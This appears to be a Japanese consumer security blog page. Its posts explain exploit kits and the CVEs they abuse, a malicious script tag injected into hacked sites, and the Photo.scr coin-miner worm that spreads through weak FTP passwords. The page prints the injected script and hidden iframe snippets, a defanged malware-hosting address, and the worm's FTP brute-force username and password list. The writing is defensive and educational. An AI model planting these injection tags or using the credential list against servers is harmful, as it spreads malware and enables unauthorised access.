無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、迷惑ソフト削除、Windows の小ネタを書き出している日本語ブログです~ (*^ー^)ノ

カテゴリ: サイト改ざん

初回投稿 2014年4月5日

<解決>エクスプロイトキットとは対策2つウイルス感染防ぐ効果2022

次のセキュリティ用語を見かけたけれど、いったい何者でしょうか?

エクスプロイトキット
(英語 Exploit Kit)

わかりやすくエクスプロイトキットとは、自宅や企業などで使われている Windows XP/Vista/7/8/10/11 パソコンを攻撃する場面で採用される 悪意のある不正な Web アプリケーション のことです。

エクスプロイトキット関連の影響環境
Windows コンピュータウイルスの感染攻撃を仕掛ける主戦場
Mac OS X だいぶ前に Mac 向けのバックドア Flashback のウイルス感染例あり
(「Java for Mac」 の脆弱性を悪用)
Android OS だいぶ前にスマホ/タブレット/スマートTVの画面をロックするランサムウェア感染例あり
(「Android 標準ブラウザ」 の脆弱性を悪用)

エクスプロイトキットの目的は、ターゲットとなる端末に コンピュータウイルス (マルウェア) を ”強制的” にダウンロードさせて感染 させることです。

エクスプロイトキットの攻撃経路はネットサーフィン中

Web アプリケーションであるエクスプロイトキットに出会うタイミングは 2 パターンあります。

  1. Web 広告のサーバーから不正なコンテンツが配信される
    国内外の一般サイトで目にする Web 広告を介して攻撃処理が流れてくる
    → 広告配信システムを悪用する 「マルバタイジング」 と呼ばれる攻撃

  2. 改ざん被害を喰らってる Web サイトを運悪く閲覧する
    企業や個人が管理する国内外の Web サイトが第三者にハッキングされている

【マルバタイジングとは?】
マルバタイジング 「malvertising」 は、「malware」 + 「advertising」 に由来する造語

Q. 広告のバナーやリンクをユーザーがポチッとクリックしなければ危険性なし?
いいえ。様々な広告コンテンツを ”表示” するブラウザの内部処理だけで攻撃を喰らうリスクがあります。

Q. コンテンツブロッカー機能を持つブラウザ拡張機能は有効?
広告コンテンツの表示を抑制する拡張機能によって、広告配信サーバーから流れてくるエクスプロイトキットの遭遇率を下げる効果は十分にあります。ただ、正規の Web サイトそのものがハッキングされるシチュエーションでは効果が期待できません。

エクスプロイトキットに遭遇するのはブラウザでてネットサーフィン中というのが基本なので、次のような作業で出会うことはありません。

  • 善人を装う詐欺師から DM で受け取ったファイルをダブルクリックして開く

  • メールソフトや Web メール上で受信したEメールの本文を読む

  • Eメールの添付ファイルをダブルクリックして開く

  • パソコンの USB ポートに USB フラッシュメモリを接続する

ただ。、エクスプロイトキットはユーザーの目視で明らかに異常に気づける脅威でもなく、Windows ユーザーさんに対して次のウイルス対策を提案するのは 無謀 です。

× 注意を払ってエクスプロイトキットの攻撃をササッとよける
× ブラウザで怪しい海外サイトやエッチなサイトを閲覧しない

無料! エクスプロイトキットに効果的なウイルス対策 2 つ

エクスプロイトキットを採用してウイルス感染攻撃が成功するか失敗するか?

その成否は PC にセキュリティ上の欠陥 (脆弱性 : ぜいじゃくせい) が存在し、それを上手く悪用できるかどうか次第です。

ところが、脆弱性は無料で提供されている最新バージョンで修正済み なので、ブラウザの脆弱性を解消してエクスプロイトキットを無に帰すウイルス対策が重要です。

ウイルス対策に最新の Windows ブラウザを使う】
Microsoft Edge (Chromium ベース)
Google Chrome
Mozilla Firefox

一方、サポート終了済みで旧式のブラウザやプラグインは、エクスプロイトキットの影響を受けやすく使用禁止です。

ウイルス対策に旧 Windows ブラウザを使用しない】
Internet Explorer … 2022年6月にマイクロソフトのサポート終了
Microsoft Edge 従来版 … 2021年3月にマイクロソフトのサポート終了

【Internet Explorer 向けの旧プラグインも使用しない】
Adobe Flash Player … 2020年12月に Adobe のサポート終了
Adobe Reader
Adobe Shockwave Player
… 2019年4月に Adobe のサポート終了
Oracle Java (JRE)
Microsoft Silverlight
… 2021年10月にマイクロソフトのサポート終了

Microsoft Defender を代表的に、Windows 10 や Windows 11 には何かしらセキュリティソフトがインストール済みだけど、その導入の効果に 脆弱性そのものは解消しない ところがポイントです。

エクスプロイトキットの対策?
セキュリティ製品の購入を提案するだけの 「広告」 ページに注意


エクスプロイトキットのウイルス対策は無料♪

Windows 10 や Windows 11 でエクスプロイトキットの脅威に 100% 対抗する効果的な 無料ウイルス対策 2 つ がこれ!

  1. 毎月の定例更新 Windows Update は実施できていますか?
    https://www.microsoft.com/ja-jp/safety/protect/musteps.aspx

  2. インストールしてあるブラウザは最新版に更新できていますか?
    「Microsoft Edge」 「Google Chrome」 「Mozilla Firefox」

マイクロソフトのサポートが終了した Windows XPWindows VistaWindows 7Windows 8、大昔にもてはやされて狙われやすいブラウザ Internet Explorer は、攻撃に悪用されうる脆弱性の修正がもう行われません。

これは脆弱性が新たに発見されていく時間の経過に伴って使用するリスクが上昇していき、すでに危険レベルが振り切れているから、「危険! 使用しないで!」 という呼びかけになっています。

(参考) エクスプロイトキットの種類とウイルス検出名

エクスプロイトキットは 1 つだけではなく、複数のブランドが存在します。

特にロシア語圏の攻撃者グループが、マルウェア (コンピュータウイルス) を拡散させたいサイバー犯罪者を相手にエクスプロイトキットを使用する権利を貸し出すサービスを提供しているみたいです。

Internet Explorer (CVE-2016-0189 CVE-2018-8174) / Microsoft Edge (VE-2016-7200) / Flash Player (CVE-2015-3105 CVE-2015-5119 CVE-2018-4878) / Java (CVE-2011-3544 CVE-2012-4681 CVE-2013-0422)
〔2018年〕 エクスプロイトキットで悪用される脆弱性
(出典 Malwarebytes

RigEK Silverlight (CVE-2016-0034) / Neutrino Flash (CVE-2016-4117 CVE-2016-1019) / Angler Flash (CVE-2016-4117 CVE-2016-1001) Silverlight (CVE-2016-1034) / Sundown Silverlight (CVE-2016-0034) / Nuclear Flash (CVE-2016-1019) / Magnitude Flash (CVE-2016-4117 CVE-2016-1019)
〔2016年〕 エクスプロイトキットで悪用される脆弱性
(出典 Trend Micro


〔2015年〕 エクスプロイトキットで悪用される脆弱性
(出典 Malwarebytes

ネットサーフィン中にエクスプロイトキットが仕掛けられた不正なページが読み込まれると、「実行ファイルをダウンロードして保存していいか?」 とか 「ダウンロードされた実行ファイルを起動してもいいか?」 といった確認の場面が一切なく、コンピュータウイルス (マルウェア) の感染が実現しうることになります。

  • エクスプロイトキットを介してマルウェアに強制感染する
    UrsnifRamnit、Dridex、AZORult、Smoke Loader、Phorpiex、Fareit、RedLine など

  • エクスプロイトキットを介してランサムウェアに強制感染する
    GandCrabLocky、Mole Ransomware、CerberSodinokibi など

ユーザーは実被害が発生して始めて異変に気づくかもしれないし、あるいは感染した事実にすら気づけない恐れもあります。


現役の 「RIG Exploit Kit」 で悪用される脆弱性

2022 年においても攻撃が観測されているというエクスプロイトキットの 1 つ 「RIG Exploit Kit」 (RIG EK) は、ブラウザの 「Internet Explorer」 「Microsoft Edge 従来版」、アドオンの 「Adobe Flash Player」 の脆弱性を悪用します。

【エクスプロイトキット 「RIG Exploit Kit」 で悪用される脆弱性】

CVE-2021-26411
「Microsoft Internet Explorer 9、11、Microsoft Edge には、メモリ破損の脆弱性が存在します。」

CVE-2020-0674 「Microsoft が提供する Internet Explorer の JScript スクリプトエンジンには、メモリ破損の脆弱性が存在します。」

CVE-2019-0752 「Internet Explorer 10 および 11 には、スクリプトエンジンが Internet Explorer のメモリ内のオブジェクトを処理する方法に不備があるため、リモートでコードを実行される脆弱性が存在します。」

CVE-2018-8174 「複数の Microsoft Windows 製品には、VBScript エンジンのメモリ内のオブジェクト処理に不備があるため、リモートでコードを実行される脆弱性が存在します。」

CVE-2016-0189 「Internet Explorer 9 から 11 およびその他の製品で使用される Microsoft (1) JScript および (2) VBScript エンジンには、任意のコードを実行される、またはサービス運用妨害 (メモリ破損) 状態にされる脆弱性が存在します。」

CVE-2015-2419 「Microsoft Internet Explorer 10 および 11 の JScript 9 には、任意のコードを実行される、またはサービス運用妨害 (メモリ破損) 状態にされる脆弱性が存在します。」

CVE-2015-0313 「Adobe Flash Player には、ヒープベースのバッファオーバーフローの脆弱性が存在します。」 「Windows 版と Macintosh 版の Adobe Flash Player 16.0.0.296 以前のバージョンに重大な脆弱性 (CVE-2015-0313) が存在します。 この脆弱性に付け込まれた場合、クラッシュを引き起こしたり、場合によっては対象システムが攻撃者に乗っ取られたりするおそれがあります。」

CVE-2014-6332 「複数の Microsoft 製品の OLE には、任意のコードを実行される脆弱性が存在します。」

CVE-2013-2551 「Microsoft Internet Explorer 6 から 10 は、解放済みメモリの使用 (Use-after-free) により、任意のコードを実行される脆弱性が存在します。」

https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis
【エクスプロイトキット 「Spelevo Exploit Kit」 で悪用される脆弱性】

CVE-2018-8174 「複数の Microsoft Windows 製品には、VBScript エンジンのメモリ内のオブジェクト処理に不備があるため、リモートでコードを実行される脆弱性が存在します。」

CVE-2018-15982 「Adobe が提供する Flash Player および Flash Player Installer には、次の脆弱性が存在します。Adobe Flash Player に解放済みメモリの使用 (Use-after-free) (CWE-416) - CVE-2018-15982」 「Windows 版、macOS 版、Linux 版、および Chrome OS 版の Adobe Flash Player を対象としたセキュリティアップデートが公開されました。これらのアップデートは、Adobe Flash Player におけるクリティカルな脆弱性と、Adobe Flash Player における重要の脆弱性に対処します。この脆弱性が悪用されると、現在のユーザーのコンテキストでの任意のコード実行や権限昇格の原因になりかねません。」

https://blog.talosintelligence.com/spelevo-exploit-kit/

脆弱性の ID 番号は 「CVE-[報告された西暦]-****」 になっているので、エクスプロイトキットで悪用される脆弱性に対処する無料ウイルス対策 ができている Windows 10 や Windows 11 ならば影響なしです。

サポート切れの Windows は危険という理由
2021年4月 CVE-2021-26411 に対処するセキュリティ更新プログラムを配信
2020年2月 CVE-2020-0674 に対処するセキュリティ更新プログラムを配信
(サポート終了済みだった Windows 7 にも特別に配信された)
2020年1月17日 マイクロソフトが未修正の脆弱性 CVE-2020-0674 を報告
2020年1月14日 マイクロソフトによる Windows 7 のサポート終了
2017年4月 マイクロソフトによる Windows Vista のサポート終了
2014年4月 マイクロソフトによる Windows XP のサポート終了


エクスプロイトキットの攻撃は意外と身近!?

エクスプロイトキット 「RIG Exploit Kit」 (RIG EK) を使ってネットバンキング不正送金被害に繋がるコンピュータウイルス (マルウェア) を感染させるサイバー攻撃が確認され、ここに日本の複数の正規サイトが意図せず加担していた おっかない事案が報告されています。

RIG-EK 改ざんサイト無害化の取組 (JC3 日本サイバー犯罪対策センター)
https://www.jc3.or.jp/threats/archive/topics/op_rigek.html

JC3 では、攻撃ツール RIG-EK を使用した不正プログラムの感染拡大を把握しており、日本の改ざんサイトの無害化に取り組んでおります。
JC3 では、不正送金事犯情報分析プロジェクト及び脅威情報活用ワーキンググループの参加企業が中心となり、全国の RIG-EK 改ざんサイトに関する情報を収集してきました。これらの改ざんされたウェブサイトを閲覧したユーザは、不正プログラムに感染してインターネットバンキングの不正送金などの犯罪の被害にあうおそれがあります。
ウイルス感染を目的としたウェブサイト改ざんの対策について (警察庁)
https://www.npa.go.jp/cyber/policy/pdf/rig.pdf

一般財団法人日本サイバー犯罪対策センター (JC3) と連携した分析により、平成28年9月頃から、「RIG-EK」 と呼ばれる攻撃ツールが組み込まれたサイトに誘導するよう改ざんされたウェブサイトが急増していることが確認された。
国内の改ざんされたサイトの管理者が判明した 298 サイトについて、38 都道府県警察において、当該サイト管理者等に対して、改ざん状況の確認、サイトの修復の依頼等の対策を実施。


エクスプロイトキットのウイルス検出名

マイクロソフトのセキュリティソフト Windows Defender が定義するエクスプロイトキットのウイルス検出名です。

Nuclear Pack
Exploit:JS/Neclu Exploit:HTML/Neclu Exploit:SWF/Neclu

・ Angler Exploit Kit
Exploit:JS/Axpergle Exploit:HTML/Axpergle Exploit:SWF/Axpergle

・ Nutrino Pack
Exploit:HTML/NeutrinoEK Exploit:JS/NeutrinoEK TrojanDownloader:JS/NeutrinoEK Exploit:JS/Urntone

・ FlashPack Exploit Kit
Exploit:JS/Fashack Exploit:HTML/Fashack Exploit:SWF/Fashack Exploit:Java/Fashack

・ GongDa Pack, KaiXin Exploit Kit → 珍しい中国製
Exploit:JS/DonxRef VirTool:JS/DonxRef Exploit:JS/Kaixin Exploit:HTML/Kaixin

・ Fiesta Exploit Kit
Exploit:JS/Fiexp Exploit:HTML/Fiexp Exploit:Win32/Fiexp Exploit:Java/Fiexp

・ RIG Exploit Pack, Goon/Infinity Exploit Kit
Exploit:JS/Meadgive Exploit:HTML/Meadgive Exploit:SWF/Meadgive TrojanDownloader:HTML/Meadgive Exploit:Java/Meadgive TrojanDownloader:VBS/Meadgive Exploit:JS/Rigploit

・ Magnitude Exploit Kit
Exploit:HTML/Pangimop Trojan:JS/Pangimop Behavior:Win32/Pangimop

・ Stegano Exploit Kit, Astrum
Exploit:HTML/SteganoEK

・ Sundown Exploit Kit
Exploit:HTML/SundownEK Exploit:JS/SundownEK

・ Sweet Orange Exploit Kit
Exploit:JS/Anogre Exploit:Java/Anogre Exploit:SWF/Anogre Exploit:Win32/Anogre Exploit:Win64/Anogre TrojanDownloader:Win32/Anogre

・ Blackhole Exploit Kit, Cool Exploit Kit → 開発者とされるロシア人が摘発された
Exploit:JS/Blacole Exploit:Java/Blacole Exploit:SWF/Blacole Trojan:JS/BlacoleRef Trojan:HTML/BlacoleRef Exploit:JS/Coolex Exploit:JS/Aimesu Exploit:JS/Blacole.GB

・ その他
Exploit:HTML/Wecalo Exploit:HTML/Tunec

エクスプロイトキットが仕掛けられた不正なページの <JavaScript> タグ、あるいは <iframe> タグのウイルス検出名です。

Exploit:HTML/IframeRef
Exploit:HTML/IframeRef.gen
Exploit:HTML/IFrame
Trojan:JS/IframeRef
Trojan:JS/Redirector
Trojan:JS/Quidvetis
Trojan:JS/Seedabutor
Trojan:HTML/Redirector

これらのウイルス検出名をキーワードに Google や Yahoo! で調べると、評価の低いシステムメンテナンスソフト SpyHunter 5Wiper SoftReimage Repair をダウンロードするよう誘う 偽セキュリティ情報サイト (詐欺サイト) がヒットします。

関連するブログ記事

このエントリーをはてなブックマークに追加

サイト改ざん被害か「iclickcdn tag.min.js」不正なJavaScriptタグ

584ff9bb.png

Google Chrome、Microsoft Edge、Mozilla Firefox ブラウザを使ってネットサーフィン中、次のような謎の <script> タグがページの最後尾あたりに挿入されているウェブサイトあり?

【不審なJavaScript コード】
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https:// iclickcdn[.]com/ tag.min.js',[ランダムな数字],document.body||document.documentElement)</script>

これは悪意のある第三者に不正アクセスされてハッキングされたウェブサイトを運悪く訪問した可能性があり、ウェブサイトから離脱してもらい、ブラウザのキャッシュデータ・一時ファイルを削除しましょう。


怪しい広告表示に関連か

iclickcdn.com VirusTotal malicious malware adware

なお、このドメイン iclickcdn[.]com からは、だいぶ怪しい 広告表示 に関連する処理を流してきます。

  • ウェブサイト上をマウスでクリックすると広告ページへ強制的に移動する

  • 「通知の表示」 を確認するブラウザのポップアップが上部に表示される
    → パソコンの 右下に偽警告の通知 が大量に表示されるトラブルの元凶

脅威の分類では、マルウェアというより アドウェア でしょうか?


このエントリーをはてなブックマークに追加

初回投稿 2016年10月15日

<感染>NASで増殖するPhoto.scrウイルスはftpサーバー原因か

WindowsのスクリーンセーバーPhoto.scr、info.zip、実行ファイルupdate.exe増殖するウイルス感染被害。運用するNASサーバーに対して脆弱なftpパスワード経由のブルートフォースアタックで不正アクセス攻撃はワーム感染が原因

Chrome / Firefox / Edge ブラウザで普通の一般サイトをネットサーフィンしていたら、次のようなナゾの ファイル をいきなり突然ダウンロードするように促された!?

  • Photo.scr

  • info.zip
    └ 圧縮ファイルの展開で中身 IMG001.scr

  • update.exe

そんな場合、ゼッタイにゼッタイに…

ファイルを開いて起動したらダメ!!!

なお、このファイル形式は Windows の スクリーンセーバー .scr や 実行ファイル .exe です。

言い換えると、Windows 以外の macOS、Android スマホ、iOS (iPhone / iPad)、Linux、ガラケー といった環境では動作しないファイルなので影響ありません。

不正なタグでウイルスの手動ダウンロード?

このファイルをダウンロードする仕掛けが施されていた一般サイトは、明らかに 改ざん被害 を喰らっているパターンでした。

実際に改ざんされていた日本の一般サイトの html ソースコードを確認したら、次のスクリーンショット画像のように 不正なインラインフレームタグ <iframe> がページの最後尾付近にシレッと挿入されているのです。 <うひゃ~

イメージ 2
社会福祉法人のホームページ

イメージ 1
会社事業所のホームページ

イメージ 5
建設会社のホームページ

イメージ 8
旅行会社のホームページ
(挿入位置は最上部)

【挿入される不正なコード例 その1】
<iframe src= Photo.scr width=1 height=1 frameborder=0>
</iframe>
【挿入される不正なコード例 その2】
<iframe src = update.exe width=1 height=1 frameborder=0>
</iframe>

ここは、何もいかがわしいエッチぃなコンテンツで溢れる 怪しいサイト ではありません。

怪しいサイトに行かないから、ウチの PC はウイルス感染は無縁」 といった、現実に起こっている改ざん被害とズレていて、セキュリティの意識が希薄な Windows ユーザーさんは注意が必要です。

写真? Photo.scr の見た目でウイルス分析

ファイル名 「Photo.scr」 から 写真(フォト) と錯覚させたいのだろうけど、ファイルの種類 (拡張子) は .scr です。

一般的な写真の形式 JPEG の画像ファイル .jpg ではなく、セキュリティ感覚に問題がない Windows ユーザーさんならば、この怪しいファイルがコンピュータウイルス・マルウェアと気づけるでしょう。 <ファイルサイズも異様にデカいし

- Photo.scr ウイルス実物画像 -

イメージ 3
「フォルダー」 っぽく見えるアイコンの偽装でクリックを誘う

ただし、Windows の 設定でファイルの拡張子を表示しない ままだと、見た目が 『写真が含まれている Photo フォルダー』 にしか見えません。

イメージ 4
完全に 「フォルダー」 にしか見えん

うっかり Photo.scr をダブルクリックして自爆してしまう危険性は 0 とは言えないでしょう。

ウイルスの詳細とセキュリティ関連の記事

セキュリティ製品のウイルス検出名

この不正なファイルは、主要な Windows 向けセキュリティソフトがほぼ100%脅威と判定して検疫するので、コンピュータウイルスやマルウェアと気づくことなく開く可能性は低いはずです。 <セキュリティソフトが機能していないとか論外

【ファイルのハッシュ値 と VirusTotal スキャン結果】
Photo.scr

サイズ 1.50 MB (1,578,496 バイト)
MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA-1 aeccba64f4dd19033ac2226b4445faac05c88b76

IMG001.scr
MD5 fbbcf1e9501234d6661a0c9ae6dc01c9
SHA-1 1ca9759a324159f331e79ea6871ad62040521b41

update.exe
MD5 340a7feab3a126973b31b5224d0514d3
SHA-1 490514aca3cca72f0a40144295db97b8aa742e45

NsCpuCNMiner32.exe
MD5 3afeb8e9af02a33ff71bf2f6751cae3a
SHA-1 fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107
【セキュリティソフトのウイルス検出名例】
avast Win32:CryptoMiner-Z [Trj] Script:SNH-gen [Trj]
Avira TR/BitCoinMiner.fra TR/BitCoinMiner.owpxk
BitDefender Trojan.AgentWDCR.HWR Trojan.AgentWDCR.ERF Trojan.GenericKD.34597380
ESET Win32/Crytes.AA Win32/BitCoinMiner.BX NSIS/CoinMiner.K Win32/CoinMiner.CAR
Kaspersky Trojan.Win32.Agentb.btdr Trojan.Win32.Miner.ays Trojan.NSIS.Agent.pf
Malwarebytes PUP.Optional.BitCoinMiner Trojan.BitCoinMiner  RiskWare.BitCoinMiner
McAfee Generic.zn Trojan-CoinMiner
Microsoft Trojan:Win32/CoinMiner.BB!bit Trojan:Win32/CoinMiner!rfn Trojan:Win32/CoinMiner!bit
Sophos Troj/Miner-CZ Mal/Miner-C
Symantec SMG.Heur!gen Trojan.Coinbitminer
Trend Micro WORM_COINMINE.NC WORM_COINMINER.QA WORM_COINMINER.RT

セキュリティ会社の脅威情報によると、ウイルス感染時の症状は次のような感じです。 <CoinMiner

  1. Windows マシンのリソースを勝手に使って仮想通貨ビットコインをマイニングする

  2. 感染マシン内にある .php ファイル、.html ファイルを改ざんする
    → 不正なインラインフレームタグ <iframe> をページの最後尾に挿入

  3. Windows マシンのあらゆるフォルダーに Photo.scr のコピーを投下して増殖する

  4. 脆弱な ftp サーバーにブルートフォース攻撃で不正アクセスする
    → 世界中のサーバーに Photo.scr ウイルスをアップロードする

ワーム的な動作があり、感染被害者は マルウェアの拡散に加担する加害者 にもなります。

実行ファイル単体配布でインストール作業が不要な おすすめウイルス削除ツール(無料) をまずは入手し、Windows パソコンでウイルスが起動しない状態の セーフモードで起動 してウイルススキャンして駆除する方法が無難でしょう。



ftp サーバーのユーザー名やパスワード

この Photo.scr ウイルスのデータ内部には、世界中の脆弱な ftp サーバーにブルートフォース攻撃で不正アクセスする処理があり、実際に攻撃で使われている ユーザー名パスワードの文字列 がコチラ♪

イメージ 7
総当たり攻撃するためのパスワード一覧

【ftp サーバーに不正アクセスするユーザー名&パスワード例】
000000
111111
123
123123
1234
12345
123456
1234567
12345678
123456789
1234567890
123qwe
abc123
admin
Admin
admin123
administrator
anonymous
derok010101
devry
email@email.com
ftp
pass
pass1234
password
qwerty
test
windows
www-data
無題な濃いログ

まさに、複雑なパスワード文字列ではない 「アルファベットや数字の羅列」 「キーボードの配列」 「辞書にのっている英単語」、いわゆる 使ってはいけない危険なパスワード でお馴染みです。 


Photo.scr ウイルス関連ページ

Photo.scr 感染被害者さんのお話、セキュリティ情報サイトの記事です。

NASがBitcoinMinerに感染! - hariwiki@Wiki
NAS内にPhoto.scrが現れたりするのは、私が常時接続のネットワーク上で、NASのFTPサービスを使っていたため、外部からこのFTPサーバであるNASに侵入されたようです。パスワードも掛けていたのですが、レベルの低いものだったのでクラックされたみたいです。
https://w.atwiki.jp/hariwiki/pages/16.html

マルウェア?:Photo.scr - My Journal
本人は海外出張中でした。ファイルは、常時ネットワークにつながっているNAS上に、数万個入っていました。ウィルス対策ソフトで削除しようとしましたが、うまくいきませんでした。
http://young-at-heart.club/my_journal/2019/06/09/

会社のパソコンが最近壊れ新しくしました。OSはXPです。XPでないと動かない機械があるからです。最近、そこに繋がってるテラステーションなどにPhoto.scrというスクリーンセーバーがやたらと作成されており、調べたところウイルス感染とわかりました。
https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13190869598

けろさんのツイート: "うちの鯖に時々ssh attackしてくる111 dot 64 dot 207 dot 217、80番開きに行くとWin32/Crytes.AA入りのPhoto.scrのダウンロードが始まるので怖い物みたい人は開いてみて"
https://twitter.com/kero7/status/914917127294918656

星野さんのツイート: "なんか、、、ネットワークドライブ内に作ったフォルダのひとつひとつに「info.zip」なるものが作られてて、なんやこれ?思てファイルのスキャンをやってみたらウイルス的なのが入ってて、何個か調べたら全部に同じのが入ってた。。。"
https://twitter.com/haruka_hoshino/status/691539001895833600

北浜のるてさんのツイート: "外付けHDDを一時期wifiルータ使ってNASみたくしてたんだけど、どうも侵入されてマルウェア(Photo.scr)仕掛けられてたらしくてアレだな"
https://twitter.com/norte_kita/status/1125340401819250688
NAS サーバーを悪用し仮想通貨を採掘するマルウェア 自社の NAS サーバーは大丈夫? - ソフォス
Mal/Miner-C がユーザーのコンピュータを秘密裏に感染させ、ホストサーバーと通信し、バックグラウンドで密かに採掘を実行する方法について説明しています。1 台のコンピューターでは仮想通貨の採掘にそれほど大きな影響はないかもしれませんが、数百台または数千台のコンピューターを感染させ、できる限り多くの通貨を取得するために、サイバー犯罪者はこのマルウェア (ワームのように自己増殖します) によってできる限り多くのコンピューターを感染させようとしています。
https://nakedsecurity.sophos.com/ja/2016/09/08/

The PhotoMiner Campaign - GuardiCore
https://www.guardicore.com/2016/06/the-photominer-campaign/

Analysis of a cryptomining malware or why clicking on folder icons can be dangerous - Internetwache
https://en.internetwache.org/analysis-of-a-cryptomining-malware-or-why-clicking-on-folder-icons-can-be-dangerous-09-09-2016/

Resurrection of the Evil Miner - FireEye
https://www.fireeye.com/blog/threat-research/2016/06/resurrection-of-the-evil-miner.html

Obfuscated Bitcoin Miner Propagates Through FTP Using Password Dictionary - Fortinet
https://www.fortinet.com/blog/threat-research/obfuscated-bitcoin-miner-propagates-through-ftp-using-password-dictionary.html


このエントリーをはてなブックマークに追加

↑このページのトップヘ